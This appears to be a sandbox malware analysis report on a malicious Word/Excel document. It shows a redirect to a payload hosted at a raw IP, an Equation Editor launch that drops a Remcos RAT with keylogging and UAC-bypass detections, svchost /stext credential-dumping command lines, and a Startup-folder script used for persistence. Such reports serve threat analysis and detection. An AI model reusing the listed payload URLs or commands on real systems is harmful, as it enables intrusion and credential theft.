                                                                6192.168.2.2249168188.114.97.34433856C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                TimestampBytes transferredDirectionData
                                                                2024-10-12 14:39:54 UTC134OUTHEAD /7al0eY HTTP/1.1
                                                                User-Agent: Microsoft Office Existence Discovery
                                                                Host: shuvi.io
                                                                Content-Length: 0
                                                                Connection: Keep-Alive
                                                                2024-10-12 14:39:54 UTC1011INHTTP/1.1 302 Found
                                                                Date: Sat, 12 Oct 2024 14:39:54 GMT
                                                                Content-Type: text/plain; charset=utf-8
                                                                Content-Length: 197
                                                                Connection: close
                                                                X-DNS-Prefetch-Control: off
                                                                X-Frame-Options: SAMEORIGIN
                                                                Strict-Transport-Security: max-age=15552000; includeSubDomains
                                                                X-Download-Options: noopen
                                                                X-Content-Type-Options: nosniff
                                                                X-XSS-Protection: 1; mode=block
                                                                Location: http://104.168.7.25/xampp/ew/wecreatednewthigsforsuccessfulljournecyr________verynicepeoplesetirethigstogoformegreat________________nnicwaytoentreithigntochangewithmegreat.doc
                                                                Vary: Accept
                                                                X-Served-By: shuvi.io
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=V0%2F1GJYf5MyI7Sn5jmn%2BlGFctlaZA%2BMnrg6%2BxwoMABYFrPygms8SzhK0fDbfikQOs%2FiC5nxhfxSlq762s2le1QHKbmCBWqKIdMef9Jyfxvxtzb8XD%2F6WscQ44g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d17d78d2b0e7295-EWR
                                                                alt-svc: h3=":443"; ma=86400


                                                                Click to jump to process

                                                                Click to jump to process

                                                                Click to dive into process behavior distribution

                                                                Click to jump to process

                                                                Target ID:0
                                                                Start time:10:39:20
                                                                Start date:12/10/2024
                                                                Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                Wow64 process (32bit):false
                                                                Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                                                                Imagebase:0x13f4c0000
                                                                File size:28'253'536 bytes
                                                                MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:false

                                                                Target ID:4
                                                                Start time:10:39:43
                                                                Start date:12/10/2024
                                                                Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                Wow64 process (32bit):false
                                                                Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" -Embedding
                                                                Imagebase:0x13f970000
                                                                File size:1'423'704 bytes
                                                                MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:false

                                                                Target ID:9
                                                                Start time:10:39:54
                                                                Start date:12/10/2024
                                                                Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                                                                Imagebase:0x400000
                                                                File size:543'304 bytes
                                                                MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                Target ID:10
                                                                Start time:10:39:57
                                                                Start date:12/10/2024
                                                                Path:C:\Users\user\AppData\Roaming\taskhostw.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Users\user\AppData\Roaming\taskhostw.exe"
                                                                Imagebase:0x1b0000
                                                                File size:1'290'752 bytes
                                                                MD5 hash:6539C2C942C9AA3AB9C7FE14FCCF0B4E
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Antivirus matches:
                                                                • Detection: 100%, Joe Sandbox ML
                                                                Reputation:low
                                                                Has exited:true

                                                                Target ID:11
                                                                Start time:10:39:59
                                                                Start date:12/10/2024
                                                                Path:C:\Users\user\AppData\Local\directory\name.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Users\user\AppData\Roaming\taskhostw.exe"
                                                                Imagebase:0x1260000
                                                                File size:1'290'752 bytes
                                                                MD5 hash:6539C2C942C9AA3AB9C7FE14FCCF0B4E
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000B.00000002.457244106.00000000010A0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000B.00000002.457244106.00000000010A0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000B.00000002.457244106.00000000010A0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000B.00000002.457244106.00000000010A0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                • Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000000B.00000002.457244106.00000000010A0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 0000000B.00000002.457244106.00000000010A0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                                Antivirus matches:
                                                                • Detection: 100%, Joe Sandbox ML
                                                                Reputation:low
                                                                Has exited:true

                                                                Target ID:12
                                                                Start time:10:40:00
                                                                Start date:12/10/2024
                                                                Path:C:\Windows\SysWOW64\svchost.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Users\user\AppData\Roaming\taskhostw.exe"
                                                                Imagebase:0x3d0000
                                                                File size:20'992 bytes
                                                                MD5 hash:54A47F6B5E09A77E61649109C6A08866
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000C.00000002.1055266784.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000C.00000002.1055266784.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000C.00000002.1055266784.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000C.00000002.1055266784.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                • Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000000C.00000002.1055266784.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 0000000C.00000002.1055266784.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000C.00000002.1055307081.0000000000734000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                Reputation:moderate
                                                                Has exited:false

                                                                Target ID:13
                                                                Start time:10:40:03
                                                                Start date:12/10/2024
                                                                Path:C:\Windows\SysWOW64\svchost.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:C:\Windows\SysWOW64\svchost.exe /stext "C:\Users\user\AppData\Local\Temp\slsrkklvishzfgljivqawntxyxjphjjhhw"
                                                                Imagebase:0x3d0000
                                                                File size:20'992 bytes
                                                                MD5 hash:54A47F6B5E09A77E61649109C6A08866
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:moderate
                                                                Has exited:true

                                                                Target ID:14
                                                                Start time:10:40:03
                                                                Start date:12/10/2024
                                                                Path:C:\Windows\SysWOW64\svchost.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:C:\Windows\SysWOW64\svchost.exe /stext "C:\Users\user\AppData\Local\Temp\dnxjld"
                                                                Imagebase:0x3d0000
                                                                File size:20'992 bytes
                                                                MD5 hash:54A47F6B5E09A77E61649109C6A08866
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:moderate
                                                                Has exited:true

                                                                Target ID:15
                                                                Start time:10:40:03
                                                                Start date:12/10/2024
                                                                Path:C:\Windows\SysWOW64\svchost.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:C:\Windows\SysWOW64\svchost.exe /stext "C:\Users\user\AppData\Local\Temp\nhlcmvhqk"
                                                                Imagebase:0x3d0000
                                                                File size:20'992 bytes
                                                                MD5 hash:54A47F6B5E09A77E61649109C6A08866
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:moderate
                                                                Has exited:true

                                                                Target ID:16
                                                                Start time:10:40:12
                                                                Start date:12/10/2024
                                                                Path:C:\Windows\System32\wscript.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs"
                                                                Imagebase:0xff200000
                                                                File size:168'960 bytes
                                                                MD5 hash:045451FA238A75305CC26AC982472367
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                Target ID:17
                                                                Start time:10:40:12
                                                                Start date:12/10/2024
                                                                Path:C:\Users\user\AppData\Local\directory\name.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Users\user\AppData\Local\directory\name.exe"
                                                                Imagebase:0x1260000
                                                                File size:1'290'752 bytes
                                                                MD5 hash:6539C2C942C9AA3AB9C7FE14FCCF0B4E
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000011.00000002.486080361.00000000010B0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000011.00000002.486080361.00000000010B0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000011.00000002.486080361.00000000010B0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000011.00000002.486080361.00000000010B0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000011.00000002.486080361.00000000010B0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000011.00000002.486080361.00000000010B0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                                Reputation:low
                                                                Has exited:true

                                                                Target ID:18
                                                                Start time:10:40:14
                                                                Start date:12/10/2024
                                                                Path:C:\Windows\SysWOW64\svchost.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Users\user\AppData\Local\directory\name.exe"
                                                                Imagebase:0x3d0000
                                                                File size:20'992 bytes
                                                                MD5 hash:54A47F6B5E09A77E61649109C6A08866
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000012.00000002.485943669.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000012.00000002.485943669.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000012.00000002.485943669.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000012.00000002.485943669.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000012.00000002.485943669.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000012.00000002.485943669.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000012.00000002.485970456.0000000000604000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                Reputation:moderate
                                                                Has exited:true

                                                                Call Graph

                                                                • Entrypoint
                                                                • Decryption Function
                                                                • Executed
                                                                • Not Executed
                                                                • Show Help
                                                                callgraph 1 Error: Graph is empty

                                                                Module: Sheet1

                                                                Declaration
                                                                LineContent
                                                                1

                                                                Attribute VB_Name = "Sheet1"

                                                                2

                                                                Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                                                                3

                                                                Attribute VB_GlobalNameSpace = False

                                                                4

                                                                Attribute VB_Creatable = False

                                                                5

                                                                Attribute VB_PredeclaredId = True

                                                                6

                                                                Attribute VB_Exposed = True

                                                                7

                                                                Attribute VB_TemplateDerived = False

                                                                8

                                                                Attribute VB_Customizable = True

                                                                Module: Sheet2

                                                                Declaration
                                                                LineContent
                                                                1

                                                                Attribute VB_Name = "Sheet2"

                                                                2

                                                                Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                                                                3

                                                                Attribute VB_GlobalNameSpace = False

                                                                4

                                                                Attribute VB_Creatable = False

                                                                5

                                                                Attribute VB_PredeclaredId = True

                                                                6

                                                                Attribute VB_Exposed = True

                                                                7

                                                                Attribute VB_TemplateDerived = False

                                                                8

                                                                Attribute VB_Customizable = True

                                                                Module: Sheet3

                                                                Declaration
                                                                LineContent
                                                                1

                                                                Attribute VB_Name = "Sheet3"

                                                                2

                                                                Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                                                                3

                                                                Attribute VB_GlobalNameSpace = False

                                                                4

                                                                Attribute VB_Creatable = False

                                                                5

                                                                Attribute VB_PredeclaredId = True

                                                                6

                                                                Attribute VB_Exposed = True

                                                                7

                                                                Attribute VB_TemplateDerived = False

                                                                8

                                                                Attribute VB_Customizable = True

                                                                Module: ThisWorkbook

                                                                Declaration
                                                                LineContent
                                                                1

                                                                Attribute VB_Name = "ThisWorkbook"

                                                                2

                                                                Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"

                                                                3

                                                                Attribute VB_GlobalNameSpace = False

                                                                4

                                                                Attribute VB_Creatable = False

                                                                5

                                                                Attribute VB_PredeclaredId = True

                                                                6

                                                                Attribute VB_Exposed = True

                                                                7

                                                                Attribute VB_TemplateDerived = False

                                                                8

                                                                Attribute VB_Customizable = True

                                                                Reset < >

                                                                  Execution Graph

                                                                  Execution Coverage:6%
                                                                  Dynamic/Decrypted Code Coverage:15.9%
                                                                  Signature Coverage:11.7%
                                                                  Total number of Nodes:1553
                                                                  Total number of Limit Nodes:29
                                                                  execution_graph 48777 1b568a 48778 1b569c 48777->48778 48783 1b5632 48778->48783 48782 1b56ba 48784 1b5643 48783->48784 48785 1b5674 48784->48785 48793 1b5d20 48784->48793 48799 1b5bda 48784->48799 48785->48782 48788 1b81c1 MultiByteToWideChar 48785->48788 48789 1b81e7 48788->48789 48791 1b8220 48788->48791 48790 1d0f36 19 API calls 48789->48790 48792 1b81fc MultiByteToWideChar 48790->48792 48791->48782 48792->48791 48794 1b5d93 48793->48794 48798 1b5d2e 48793->48798 48808 1b5dae SetFilePointerEx 48794->48808 48795 1b5d56 48795->48784 48797 1b5d66 ReadFile 48797->48795 48797->48798 48798->48795 48798->48797 48800 1b5bee 48799->48800 48801 1ee047 48799->48801 48809 1b5b19 48800->48809 48816 206223 19 API calls 48801->48816 48804 1b5bfa 48804->48784 48805 1ee052 48817 1d0f36 48805->48817 48807 1ee067 _memmove 48808->48798 48810 1b5b31 48809->48810 48815 1b5b2a 48809->48815 48811 1edfd7 48810->48811 48812 1d0f36 19 API calls 48810->48812 48813 1b5b51 48812->48813 48814 1b5b59 _memmove 48813->48814 48813->48815 48814->48815 48815->48804 48816->48805 48819 1d0f3e 48817->48819 48820 1d0f58 48819->48820 48821 1d0f5c std::exception::exception 48819->48821 48826 1d588c 48819->48826 48820->48807 48839 1d871b RaiseException 48821->48839 48823 1d0f86 48840 1d8651 HeapFree GetLastError __getptd_noexit _free 48823->48840 48825 1d0f98 48825->48807 48827 1d5907 48826->48827 48834 1d5898 48826->48834 48845 1d8ca8 __getptd_noexit 48827->48845 48828 1d58a3 48828->48834 48841 1da2eb 15 API calls __NMSG_WRITE 48828->48841 48842 1da348 15 API calls 2 library calls 48828->48842 48831 1d58ff 48831->48819 48832 1d58cb RtlAllocateHeap 48832->48831 48832->48834 48834->48828 48834->48832 48835 1d58f3 48834->48835 48837 1d58f1 48834->48837 48843 1d8ca8 __getptd_noexit 48835->48843 48844 1d8ca8 __getptd_noexit 48837->48844 48839->48823 48840->48825 48841->48828 48842->48828 48843->48837 48844->48831 48845->48831 48846 1be608 48849 1bd260 48846->48849 48848 1be616 48850 1bd27d 48849->48850 48866 1bd4dd 48849->48866 48851 1f29ea 48850->48851 48852 1f2a39 48850->48852 48872 1bd2a4 48850->48872 48854 1f29ed 48851->48854 48858 1f2a08 48851->48858 48906 22a4fb 180 API calls __cinit 48852->48906 48855 1f29f9 48854->48855 48854->48872 48904 22ab0f 180 API calls 48855->48904 48858->48866 48905 22afb7 180 API calls 2 library calls 48858->48905 48859 1bd594 48901 1b8bb2 26 API calls 48859->48901 48863 1bd5a3 48863->48848 48866->48848 48872->48859 48872->48866 48874 1d2ec0 48872->48874 48877 1b88a0 48872->48877 48884 1b86a2 26 API calls 48872->48884 48885 1ba000 48872->48885 48897 1b8620 48872->48897 48902 1b859a 26 API calls 48872->48902 48903 1bcedd 180 API calls 48872->48903 48907 1b8bb2 26 API calls 48872->48907 48908 206ae3 19 API calls 48872->48908 48909 1b81a7 48872->48909 48913 1d2dc4 48874->48913 48876 1d2ecb 48876->48872 48878 1b88b3 48877->48878 48879 1b8a81 48877->48879 48883 1b88c4 48878->48883 48931 1b77c7 48878->48931 48879->48872 48882 1d2ec0 __cinit 17 API calls 48882->48883 48883->48872 48884->48872 48886 1ba01f 48885->48886 48895 1ba04d 48885->48895 48887 1d0f36 19 API calls 48886->48887 48887->48895 48888 1bb5d5 48889 1b81a7 20 API calls 48888->48889 48896 1ba1b7 48889->48896 48890 1b77c7 19 API calls 48890->48895 48891 1d0f36 19 API calls 48891->48895 48893 1b81a7 20 API calls 48893->48895 48894 1d2ec0 17 API calls __cinit 48894->48895 48895->48888 48895->48890 48895->48891 48895->48893 48895->48894 48895->48896 48936 1bca20 180 API calls __NMSG_WRITE 48895->48936 48896->48872 48898 1b862b 48897->48898 48899 1b8652 48898->48899 48937 1b8b13 48898->48937 48899->48872 48901->48863 48902->48872 48903->48872 48904->48866 48905->48866 48906->48872 48907->48872 48908->48872 48910 1b81ba 48909->48910 48911 1b81b2 48909->48911 48910->48872 48952 1b80d7 20 API calls 48911->48952 48914 1d2dd0 __setmode 48913->48914 48917 1d2e08 RtlDecodePointer DecodePointer 48914->48917 48916 1d2de5 __cinit __setmode 48916->48876 48918 1d2e35 48917->48918 48919 1d2eb7 48917->48919 48918->48919 48928 1d8924 11 API calls __setmode 48918->48928 48919->48916 48921 1d2e98 EncodePointer EncodePointer 48921->48919 48922 1d2e47 48922->48921 48923 1d2e6c 48922->48923 48929 1d89e4 Sleep __recalloc_crt 48922->48929 48923->48919 48926 1d2e86 EncodePointer 48923->48926 48930 1d89e4 Sleep __recalloc_crt 48923->48930 48926->48921 48927 1d2e80 48927->48919 48927->48926 48928->48922 48929->48923 48930->48927 48932 1d0f36 19 API calls 48931->48932 48933 1b77e8 48932->48933 48934 1d0f36 19 API calls 48933->48934 48935 1b77f6 48934->48935 48935->48882 48936->48895 48938 1b88a0 26 API calls 48937->48938 48940 1b8b23 48938->48940 48939 1b8b8d 48939->48899 48940->48939 48941 1d0f36 19 API calls 48940->48941 48942 1b8b3e 48941->48942 48943 1b8b4c 48942->48943 48944 1b77c7 19 API calls 48942->48944 48945 1b8b5b 48943->48945 48950 1b80d7 20 API calls 48943->48950 48944->48943 48946 1d0f36 19 API calls 48945->48946 48948 1b8b65 48946->48948 48951 1b87c0 26 API calls 48948->48951 48950->48945 48951->48939 48952->48910 48953 1bafae 48957 1bafc2 48953->48957 48954 1bb007 48956 1b81a7 20 API calls 48954->48956 48972 1bac90 Mailbox 48954->48972 48955 1d0f36 19 API calls 48955->48957 48956->48972 48957->48954 48957->48955 48958 1b81a7 20 API calls 48957->48958 48958->48957 48961 1d0f36 19 API calls 48968 1ba097 48961->48968 48962 1bb5d5 48963 1b81a7 20 API calls 48962->48963 48969 1ba1b7 Mailbox 48963->48969 48965 1b77c7 19 API calls 48965->48968 48966 1b81a7 20 API calls 48966->48968 48967 1d2ec0 17 API calls __cinit 48967->48968 48968->48961 48968->48962 48968->48965 48968->48966 48968->48967 48968->48969 49046 1bca20 180 API calls __NMSG_WRITE 48968->49046 48970 1effc1 _memmove 48970->48972 48971 1d0f36 19 API calls 48971->48972 48972->48968 48972->48969 48972->48970 48972->48971 48973 1ba000 180 API calls 48972->48973 48974 1bade2 48972->48974 49033 22c3f4 48972->49033 49047 22c2a7 20 API calls 48972->49047 48973->48972 48974->48969 48975 1f000f VariantClear 48974->48975 48981 224570 48974->48981 48987 1c2123 48974->48987 49002 21d107 48974->49002 49027 22e037 48974->49027 49030 22e04b 48974->49030 48975->48974 48982 2245aa 48981->48982 49048 1b63a0 48982->49048 48984 2245ba 48985 1ba000 180 API calls 48984->48985 48986 2245df 48984->48986 48985->48986 48986->48974 48988 1c213b 48987->48988 48989 1d0f36 19 API calls 48988->48989 48990 1c2181 48988->48990 48991 1c2154 48989->48991 48994 1c219d 48990->48994 49058 1b5e3f 48990->49058 49063 1b5956 48991->49063 48995 1c21b7 48994->48995 48996 1f6940 48994->48996 48997 1b77c7 19 API calls 48995->48997 48998 1d0f36 19 API calls 48996->48998 49001 1c21bf 48997->49001 48999 1f6946 48998->48999 49000 1f697c _memmove 48999->49000 48999->49001 49000->49001 49001->48974 49003 21d126 49002->49003 49004 21d1c2 49003->49004 49006 1b77c7 19 API calls 49003->49006 49005 1d0f36 19 API calls 49004->49005 49026 21d214 49004->49026 49009 21d254 49005->49009 49007 21d155 49006->49007 49008 1b77c7 19 API calls 49007->49008 49010 21d15e 49008->49010 49011 1b5956 24 API calls 49009->49011 49100 1b46f9 49010->49100 49012 21d287 49011->49012 49014 21d28b GetLastError 49012->49014 49018 21d2bf 49012->49018 49014->49026 49015 21d321 49020 1d0f36 19 API calls 49015->49020 49016 21d2ea 49019 1d0f36 19 API calls 49016->49019 49017 21d17f 49017->49004 49119 213c7b 49017->49119 49018->49015 49018->49016 49021 21d2ef 49019->49021 49023 21d326 49020->49023 49025 1b77c7 19 API calls 49021->49025 49021->49026 49024 1b77c7 19 API calls 49023->49024 49023->49026 49024->49026 49025->49026 49026->48974 49126 22cbf1 49027->49126 49029 22e047 49029->48974 49031 22cbf1 23 API calls 49030->49031 49032 22e05b 49031->49032 49032->48974 49034 1b77c7 19 API calls 49033->49034 49035 22c408 49034->49035 49036 1b77c7 19 API calls 49035->49036 49037 22c410 49036->49037 49038 1b77c7 19 API calls 49037->49038 49045 22c418 49038->49045 49039 22c5f6 49039->48972 49040 1b81a7 20 API calls 49040->49045 49041 22c4bd CharUpperBuffW 49153 1b859a 26 API calls 49041->49153 49042 22c57d CharUpperBuffW 49154 1bc707 27 API calls 49042->49154 49045->49039 49045->49040 49045->49041 49045->49042 49046->48968 49047->48972 49053 1b63c5 49048->49053 49049 1b65ca 49049->48984 49050 1ee2eb 49057 1b8189 19 API calls 49050->49057 49052 1ee2f6 49055 1d0f36 19 API calls 49052->49055 49053->49049 49053->49050 49054 1b659b CharUpperBuffW 49053->49054 49054->49053 49056 1ee31b _memmove 49055->49056 49056->49049 49057->49052 49069 1b5c4e 49058->49069 49061 1b5c4e 2 API calls 49062 1b5e74 49061->49062 49062->48994 49064 1b5962 49063->49064 49079 1b5df9 49064->49079 49066 1b5981 49068 1b5993 49066->49068 49087 1b5770 49066->49087 49068->48990 49070 1b5c68 49069->49070 49071 1b5cef SetFilePointerEx 49070->49071 49072 1ee081 49070->49072 49076 1b5cc3 49070->49076 49077 1b5dae SetFilePointerEx 49071->49077 49078 1b5dae SetFilePointerEx 49072->49078 49075 1ee09b 49076->49061 49077->49076 49078->49075 49080 1b5e12 CreateFileW 49079->49080 49081 1ee0b1 49079->49081 49082 1b5e34 49080->49082 49081->49082 49083 1ee0b7 CreateFileW 49081->49083 49082->49066 49083->49082 49084 1ee0dd 49083->49084 49085 1b5c4e 2 API calls 49084->49085 49086 1ee0e8 49085->49086 49086->49082 49088 1edefe 49087->49088 49089 1b578b 49087->49089 49092 1b5e3f 2 API calls 49088->49092 49099 1b581a 49088->49099 49090 1b5c4e 2 API calls 49089->49090 49089->49099 49091 1b57ad 49090->49091 49091->49088 49093 1b57c4 49091->49093 49092->49099 49094 1d0f36 19 API calls 49093->49094 49095 1b57cf 49094->49095 49096 1b5d20 2 API calls 49095->49096 49097 1b5807 49096->49097 49098 1b5c4e 2 API calls 49097->49098 49098->49099 49099->49068 49101 1b77c7 19 API calls 49100->49101 49102 1b470f 49101->49102 49103 1b77c7 19 API calls 49102->49103 49104 1b4717 49103->49104 49105 1b77c7 19 API calls 49104->49105 49106 1b471f 49105->49106 49107 1b77c7 19 API calls 49106->49107 49108 1b4727 49107->49108 49109 1b81a7 20 API calls 49108->49109 49110 1b475b 49108->49110 49109->49110 49111 1b4801 49110->49111 49112 1b81a7 20 API calls 49110->49112 49113 1b4811 49111->49113 49114 1b81a7 20 API calls 49111->49114 49112->49111 49115 1b81a7 20 API calls 49113->49115 49117 1b4818 49113->49117 49114->49113 49115->49117 49116 1b81a7 20 API calls 49118 1b481f 49116->49118 49117->49116 49117->49118 49118->49017 49122 21449b GetFileAttributesW 49119->49122 49123 213c82 49122->49123 49124 2144b6 FindFirstFileW 49122->49124 49123->49004 49124->49123 49125 2144cb FindClose 49124->49125 49125->49123 49134 22cc2e 49126->49134 49128 22cefc 49147 1d0d88 49128->49147 49131 22cf2e 49133 22cf39 GetCurrentProcess TerminateProcess 49131->49133 49132 22cc75 Mailbox 49132->49029 49135 22cf47 49133->49135 49134->49132 49141 22ca82 49134->49141 49140 22cf7f 49135->49140 49151 1b8ea0 19 API calls 49135->49151 49137 22d0b8 49137->49132 49139 22d0cc FreeLibrary 49137->49139 49139->49132 49140->49137 49152 1b8ea0 19 API calls 49140->49152 49142 22caf2 49141->49142 49143 22ca9d 49141->49143 49142->49128 49144 1d0f36 19 API calls 49143->49144 49146 22cabf 49144->49146 49145 1d0f36 19 API calls 49145->49146 49146->49142 49146->49145 49148 1d0d9d 49147->49148 49149 1d0e35 VirtualAlloc 49148->49149 49150 1d0e03 49148->49150 49149->49150 49150->49131 49150->49135 49151->49140 49152->49140 49153->49045 49154->49045 49155 1b107d 49160 1b71eb 49155->49160 49157 1b108c 49158 1d2ec0 __cinit 17 API calls 49157->49158 49159 1b1096 49158->49159 49161 1b71fb 49160->49161 49162 1b77c7 19 API calls 49161->49162 49163 1b72b1 49162->49163 49179 1b4864 49163->49179 49165 1b72ba 49185 1d068b 49165->49185 49167 1b72c5 49168 1b77c7 19 API calls 49167->49168 49169 1b72eb 49168->49169 49170 1b72f4 RegOpenKeyExW 49169->49170 49171 1eec0a RegQueryValueExW 49170->49171 49178 1b7316 _wcscat __NMSG_WRITE 49170->49178 49172 1eec9c RegCloseKey 49171->49172 49173 1eec27 49171->49173 49172->49178 49174 1d0f36 19 API calls 49173->49174 49175 1eec40 49174->49175 49176 1eec4b RegQueryValueExW 49175->49176 49177 1eec68 49176->49177 49177->49172 49178->49157 49180 1e1ac0 49179->49180 49181 1b4871 GetModuleFileNameW 49180->49181 49182 1b4897 49181->49182 49189 1b48ae 49182->49189 49184 1b48a1 49184->49165 49186 1e1ac0 49185->49186 49187 1d0698 GetFullPathNameW 49186->49187 49188 1d06ba 49187->49188 49188->49167 49190 1e1ac0 49189->49190 49191 1b48bb GetFullPathNameW 49190->49191 49192 1b48da 49191->49192 49192->49184 49193 1b3633 49194 1b366a 49193->49194 49195 